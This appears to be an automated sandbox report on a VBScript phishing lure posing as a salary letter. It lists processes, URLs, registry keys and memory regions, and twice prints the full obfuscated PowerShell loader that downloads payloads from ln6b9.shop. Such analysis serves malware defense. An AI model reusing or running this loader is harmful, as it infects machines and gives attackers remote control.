Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Salary Increase Letter_Oct 2024.vbs
|
ASCII text, with very long lines (1625), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1ours4x.ine.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2yeomto.dht.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddfzdl.pnc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_metcihpi.1r0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Foregrib.ses
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes
Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function
Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited
-lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function
Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol
suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele
HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0
Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn
riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr
y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere
' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar:
agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns
D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa
$ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere
'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn
UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA
sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere
'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE
ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib
.noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo
csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o
R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til
';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT
m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere
' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent
(Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL
F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs
ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL
MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU
arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo
ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk
L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves
K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis
Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B
scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx
rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan
sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas
e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie
segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes
Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function
Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited
-lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function
Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol
suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele
HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0
Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn
riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr
y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere
' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar:
agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns
D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa
$ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere
'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn
UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA
sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere
'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE
ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib
.noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo
csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o
R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til
';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT
m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere
' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent
(Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL
F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs
ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL
MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU
arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo
ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk
L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves
K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis
Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B
scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx
rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan
sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas
e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie
segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 25 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
154.216.17.14
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://crl.microB
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32
|
172.67.128.117
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin#
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://ln6b9.shop
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://crl.microsoftmB4
|
unknown
|
||
|
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32XR
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin
|
172.67.128.117
|
||
|
http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.binq
|
unknown
|
||
|
http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32P
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
ln6b9.shop
|
172.67.128.117
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.17.14
|
unknown
|
Seychelles
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
172.67.128.117
|
ln6b9.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
99F9000
|
heap
|
page read and write
|
|
|
|
8BD7000
|
direct allocation
|
page execute and read and write
|
|
|
|
1B5E4687000
|
trusted library allocation
|
page read and write
|
|
|
|
9A0D000
|
heap
|
page read and write
|
|
|
|
5943000
|
trusted library allocation
|
page read and write
|
|
|
|
9A23000
|
heap
|
page read and write
|
|
|
|
83F0000
|
direct allocation
|
page execute and read and write
|
|
|
|
1B5ECAC2000
|
heap
|
page read and write
|
||
|
7FF7C00A0000
|
trusted library allocation
|
page read and write
|
||
|
1C353AB1000
|
heap
|
page read and write
|
||
|
1C3522F0000
|
heap
|
page read and write
|
||
|
83AE000
|
stack
|
page read and write
|
||
|
7FF7BFEDA000
|
trusted library allocation
|
page read and write
|
||
|
5DB678B000
|
stack
|
page read and write
|
||
|
2880000
|
trusted library allocation
|
page read and write
|
||
|
1C353BE0000
|
remote allocation
|
page read and write
|
||
|
1C353ABA000
|
heap
|
page read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
1C352078000
|
heap
|
page read and write
|
||
|
251CE000
|
stack
|
page read and write
|
||
|
25900000
|
heap
|
page read and write
|
||
|
593D000
|
trusted library allocation
|
page read and write
|
||
|
1C353F51000
|
heap
|
page read and write
|
||
|
7FF7BFDD0000
|
trusted library allocation
|
page read and write
|
||
|
1B5D2A30000
|
heap
|
page read and write
|
||
|
9A46000
|
heap
|
page read and write
|
||
|
29B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E3F000
|
stack
|
page read and write
|
||
|
5791000
|
trusted library allocation
|
page read and write
|
||
|
1B5D4500000
|
heap
|
page execute and read and write
|
||
|
1B5ECA60000
|
heap
|
page read and write
|
||
|
7FF7C0080000
|
trusted library allocation
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
1C35205E000
|
heap
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
D1D7000
|
direct allocation
|
page execute and read and write
|
||
|
1C354081000
|
heap
|
page read and write
|
||
|
7DD0000
|
heap
|
page read and write
|
||
|
2E7B000
|
heap
|
page read and write
|
||
|
1C351F70000
|
heap
|
page read and write
|
||
|
7FF7BFFC0000
|
trusted library allocation
|
page read and write
|
||
|
2840000
|
trusted library allocation
|
page read and write
|
||
|
99C0000
|
heap
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
2B8D000
|
stack
|
page read and write
|
||
|
9A4D000
|
heap
|
page read and write
|
||
|
5DB5A3F000
|
stack
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
9FD7000
|
direct allocation
|
page execute and read and write
|
||
|
7FF7BFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B5ECABC000
|
heap
|
page read and write
|
||
|
1C35205A000
|
heap
|
page read and write
|
||
|
7036EFB000
|
stack
|
page read and write
|
||
|
5DB54FE000
|
stack
|
page read and write
|
||
|
1C353AB9000
|
heap
|
page read and write
|
||
|
B420000
|
unclassified section
|
page execute and read and write
|
||
|
8400000
|
trusted library allocation
|
page read and write
|
||
|
6927000
|
remote allocation
|
page execute and read and write
|
||
|
1B5D4470000
|
trusted library allocation
|
page read and write
|
||
|
1C351FEF000
|
heap
